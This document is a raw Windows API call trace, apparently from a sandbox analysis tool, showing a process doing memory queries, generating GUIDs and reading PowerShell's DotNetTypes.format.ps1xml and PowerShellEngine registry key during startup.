[0079.693] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.694] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.695] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x3845fb17, Data2=0xe49d, Data3=0x49a8, Data4=([0]=0x8f, [1]=0xeb, [2]=0x1, [3]=0x5b, [4]=0xe3, [5]=0xb5, [6]=0xde, [7]=0xd9))) returned 0x0
[0079.695] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xfc6ccb2d, Data2=0x8dce, Data3=0x471d, Data4=([0]=0xa6, [1]=0x3f, [2]=0x61, [3]=0x68, [4]=0x55, [5]=0x34, [6]=0x3, [7]=0x9))) returned 0x0
[0079.695] VirtualQuery (in: lpAddress=0x10bc40, lpBuffer=0x10cb00, dwLength=0x30 | out: lpBuffer=0x10cb00*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.696] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.697] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.697] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x622de0bf, Data2=0x9d03, Data3=0x4b3f, Data4=([0]=0xaf, [1]=0xc3, [2]=0xc2, [3]=0x10, [4]=0x6f, [5]=0xa1, [6]=0x88, [7]=0xa7))) returned 0x0
[0079.697] VirtualQuery (in: lpAddress=0x10bc40, lpBuffer=0x10cb00, dwLength=0x30 | out: lpBuffer=0x10cb00*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.697] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.697] VirtualQuery (in: lpAddress=0x10b2b0, lpBuffer=0x10c170, dwLength=0x30 | out: lpBuffer=0x10c170*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.697] VirtualQuery (in: lpAddress=0x10b2b0, lpBuffer=0x10c170, dwLength=0x30 | out: lpBuffer=0x10c170*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.698] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xba2b3969, Data2=0x670, Data3=0x4acc, Data4=([0]=0x89, [1]=0xb6, [2]=0x80, [3]=0xa9, [4]=0xfe, [5]=0x56, [6]=0x6e, [7]=0xb1))) returned 0x0
[0079.698] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xc4631f0e, Data2=0xa379, Data3=0x45fe, Data4=([0]=0xbd, [1]=0x73, [2]=0xab, [3]=0x74, [4]=0x60, [5]=0x1, [6]=0x4e, [7]=0xc8))) returned 0x0
[0079.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.698] SetErrorMode (uMode=0x1) returned 0x1
[0079.698] SetErrorMode (uMode=0x1) returned 0x1
[0079.698] GetFileType (hFile=0x30c) returned 0x1
[0079.698] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.699] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.699] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.699] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.702] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.703] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.703] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0xbce, lpOverlapped=0x0) returned 1
[0079.703] ReadFile (in: hFile=0x30c, lpBuffer=0x3404b06, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x3404b06*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.703] ReadFile (in: hFile=0x30c, lpBuffer=0x34053d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x34053d0*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.703] SetErrorMode (uMode=0x1) returned 0x1
[0079.703] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
[0079.703] SetErrorMode (uMode=0x1) returned 0x1
[0079.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.703] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.703] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.703] CoTaskMemAlloc (cb=0x5a) returned 0x24d1a0
[0079.703] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d1a0, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.704] CoTaskMemFree (pv=0x24d1a0)
[0079.704] RegCloseKey (hKey=0x30c) returned 0x0
[0079.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.706] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xc6566b7b, Data2=0xbc96, Data3=0x4d8a, Data4=([0]=0x83, [1]=0x47, [2]=0x41, [3]=0x5e, [4]=0x7b, [5]=0x4c, [6]=0xd6, [7]=0xa0))) returned 0x0
[0079.707] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xf013361f, Data2=0x8695, Data3=0x4076, Data4=([0]=0xaa, [1]=0xef, [2]=0x8c, [3]=0xdd, [4]=0xff, [5]=0x39, [6]=0xe1, [7]=0xc2))) returned 0x0
[0079.707] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xcbb74558, Data2=0xc828, Data3=0x4824, Data4=([0]=0xa4, [1]=0xee, [2]=0xd5, [3]=0x7e, [4]=0x70, [5]=0x69, [6]=0xb8, [7]=0xa))) returned 0x0
[0079.707] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xefcd2d81, Data2=0x52f4, Data3=0x447b, Data4=([0]=0x8a, [1]=0x85, [2]=0x79, [3]=0x8a, [4]=0x87, [5]=0x30, [6]=0xfc, [7]=0xf7))) returned 0x0
[0079.707] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xedd7c047, Data2=0xb0d2, Data3=0x4d1a, Data4=([0]=0x9f, [1]=0xde, [2]=0x40, [3]=0xf9, [4]=0x8f, [5]=0x79, [6]=0xb8, [7]=0xab))) returned 0x0
[0079.707] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x2f5e6f61, Data2=0x26ac, Data3=0x4577, Data4=([0]=0xac, [1]=0x56, [2]=0xba, [3]=0x94, [4]=0x4c, [5]=0x44, [6]=0x9c, [7]=0xff))) returned 0x0
[0079.707] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.707] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe0c43a14, Data2=0x3280, Data3=0x4136, Data4=([0]=0x8d, [1]=0xb6, [2]=0xa4, [3]=0xed, [4]=0xb4, [5]=0xcb, [6]=0x9e, [7]=0xe7))) returned 0x0
[0079.708] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.708] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.708] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x99d31876, Data2=0xa771, Data3=0x415e, Data4=([0]=0x8d, [1]=0x59, [2]=0x2b, [3]=0x44, [4]=0x7c, [5]=0x76, [6]=0x33, [7]=0x0))) returned 0x0
[0079.708] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5ee87486, Data2=0x35e2, Data3=0x40a3, Data4=([0]=0x8f, [1]=0x69, [2]=0x43, [3]=0x2f, [4]=0xdf, [5]=0x14, [6]=0x91, [7]=0x25))) returned 0x0
[0079.708] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x5deea08b, Data2=0x624a, Data3=0x414c, Data4=([0]=0xbb, [1]=0x8d, [2]=0x9, [3]=0xb0, [4]=0xff, [5]=0xee, [6]=0xc6, [7]=0xdc))) returned 0x0
[0079.708] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe5f1cb7a, Data2=0xc014, Data3=0x4483, Data4=([0]=0xbf, [1]=0x16, [2]=0x39, [3]=0x5c, [4]=0xa8, [5]=0x65, [6]=0xc1, [7]=0x1c))) returned 0x0
[0079.708] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.708] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xee741e71, Data2=0x2340, Data3=0x45b1, Data4=([0]=0xb4, [1]=0x43, [2]=0x1, [3]=0x83, [4]=0x5d, [5]=0x9e, [6]=0x82, [7]=0x6a))) returned 0x0
[0079.709] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.709] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.709] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.709] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.709] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.709] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xc00ef7fd, Data2=0x547e, Data3=0x4144, Data4=([0]=0x9c, [1]=0xa8, [2]=0xe0, [3]=0x16, [4]=0x70, [5]=0xda, [6]=0x7, [7]=0xf))) returned 0x0
[0079.710] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x4fd1fff4, Data2=0x129b, Data3=0x4506, Data4=([0]=0x9e, [1]=0x47, [2]=0x48, [3]=0x2c, [4]=0x40, [5]=0x2f, [6]=0x8b, [7]=0x47))) returned 0x0
[0079.710] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x2cd9acf4, Data2=0x6c0f, Data3=0x4595, Data4=([0]=0x9f, [1]=0xa0, [2]=0x7f, [3]=0x7f, [4]=0x42, [5]=0xf6, [6]=0x97, [7]=0xe1))) returned 0x0
[0079.710] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xef75469, Data2=0xd8fd, Data3=0x4ed3, Data4=([0]=0x98, [1]=0xa9, [2]=0xc1, [3]=0x83, [4]=0x13, [5]=0x66, [6]=0xb4, [7]=0x5f))) returned 0x0
[0079.710] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x9092cbe3, Data2=0xf406, Data3=0x4e87, Data4=([0]=0xb6, [1]=0xa6, [2]=0x73, [3]=0xea, [4]=0xf5, [5]=0xf6, [6]=0xa7, [7]=0xdb))) returned 0x0
[0079.710] VirtualQuery (in: lpAddress=0x10bc40, lpBuffer=0x10cb00, dwLength=0x30 | out: lpBuffer=0x10cb00*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.710] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xbad9cfc7, Data2=0x843c, Data3=0x4481, Data4=([0]=0xb2, [1]=0xfc, [2]=0xb2, [3]=0x5b, [4]=0xe7, [5]=0xaf, [6]=0x93, [7]=0x1e))) returned 0x0
[0079.710] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x4440235e, Data2=0x5f06, Data3=0x44a2, Data4=([0]=0x92, [1]=0xe8, [2]=0x30, [3]=0x1c, [4]=0x33, [5]=0xb5, [6]=0xa7, [7]=0x99))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x20143418, Data2=0x1645, Data3=0x427c, Data4=([0]=0x95, [1]=0x70, [2]=0xf2, [3]=0xf2, [4]=0x23, [5]=0x42, [6]=0xc4, [7]=0x82))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xc659828c, Data2=0xd0bf, Data3=0x42bf, Data4=([0]=0x87, [1]=0x27, [2]=0x96, [3]=0xbb, [4]=0x12, [5]=0x3c, [6]=0xeb, [7]=0xc8))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x6cddfc37, Data2=0x6727, Data3=0x46d9, Data4=([0]=0x84, [1]=0xb5, [2]=0xeb, [3]=0xee, [4]=0x85, [5]=0xca, [6]=0xe9, [7]=0x82))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe474be55, Data2=0xed18, Data3=0x4896, Data4=([0]=0xad, [1]=0xbb, [2]=0xd3, [3]=0x27, [4]=0x62, [5]=0xd2, [6]=0x65, [7]=0xc2))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x7338d54a, Data2=0xfff0, Data3=0x472b, Data4=([0]=0xa2, [1]=0xc1, [2]=0x50, [3]=0x41, [4]=0xa7, [5]=0x54, [6]=0x52, [7]=0x8e))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x603d5d31, Data2=0x872c, Data3=0x4440, Data4=([0]=0x88, [1]=0x1a, [2]=0x5b, [3]=0x37, [4]=0xf, [5]=0x61, [6]=0xd, [7]=0xc9))) returned 0x0
[0079.711] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x875b3378, Data2=0xbeca, Data3=0x4759, Data4=([0]=0xaf, [1]=0x1c, [2]=0x8d, [3]=0x98, [4]=0x75, [5]=0x23, [6]=0xa3, [7]=0xb))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x9d26d8c6, Data2=0x922f, Data3=0x4d75, Data4=([0]=0xa0, [1]=0x9e, [2]=0xa9, [3]=0x63, [4]=0xce, [5]=0xbb, [6]=0x2d, [7]=0xe5))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x3ee64368, Data2=0x780b, Data3=0x463c, Data4=([0]=0x85, [1]=0x37, [2]=0x82, [3]=0x27, [4]=0x17, [5]=0x3d, [6]=0x66, [7]=0x57))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x386bc810, Data2=0xf14d, Data3=0x428b, Data4=([0]=0xa4, [1]=0xbe, [2]=0xb5, [3]=0x3b, [4]=0xbe, [5]=0x96, [6]=0x54, [7]=0xe7))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xbf69ee2b, Data2=0x35d2, Data3=0x4d7a, Data4=([0]=0xb0, [1]=0xc7, [2]=0x7b, [3]=0xa, [4]=0xf5, [5]=0xb6, [6]=0x62, [7]=0xd4))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe6c770c3, Data2=0x614e, Data3=0x4fb1, Data4=([0]=0xa2, [1]=0x5a, [2]=0x8e, [3]=0x9b, [4]=0x64, [5]=0x7f, [6]=0xec, [7]=0xfc))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x3b78cb42, Data2=0x846, Data3=0x457c, Data4=([0]=0x88, [1]=0x4d, [2]=0xad, [3]=0x0, [4]=0x8b, [5]=0xd5, [6]=0x64, [7]=0xa6))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe94636fa, Data2=0xbffa, Data3=0x4113, Data4=([0]=0xb0, [1]=0x97, [2]=0x45, [3]=0xb0, [4]=0x8f, [5]=0xce, [6]=0x68, [7]=0x42))) returned 0x0
[0079.712] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe15ec86f, Data2=0x6537, Data3=0x4f64, Data4=([0]=0xba, [1]=0xe, [2]=0x9, [3]=0x64, [4]=0x29, [5]=0xe9, [6]=0x1f, [7]=0x96))) returned 0x0
[0079.713] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x7bd72f1e, Data2=0xfaa9, Data3=0x4d62, Data4=([0]=0xbe, [1]=0x64, [2]=0x4a, [3]=0xa1, [4]=0x2c, [5]=0xd7, [6]=0x6e, [7]=0xf3))) returned 0x0
[0079.713] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x74d11299, Data2=0x3f60, Data3=0x486e, Data4=([0]=0xb3, [1]=0x54, [2]=0x5f, [3]=0x98, [4]=0x50, [5]=0xdb, [6]=0x31, [7]=0x44))) returned 0x0
[0079.713] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.713] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
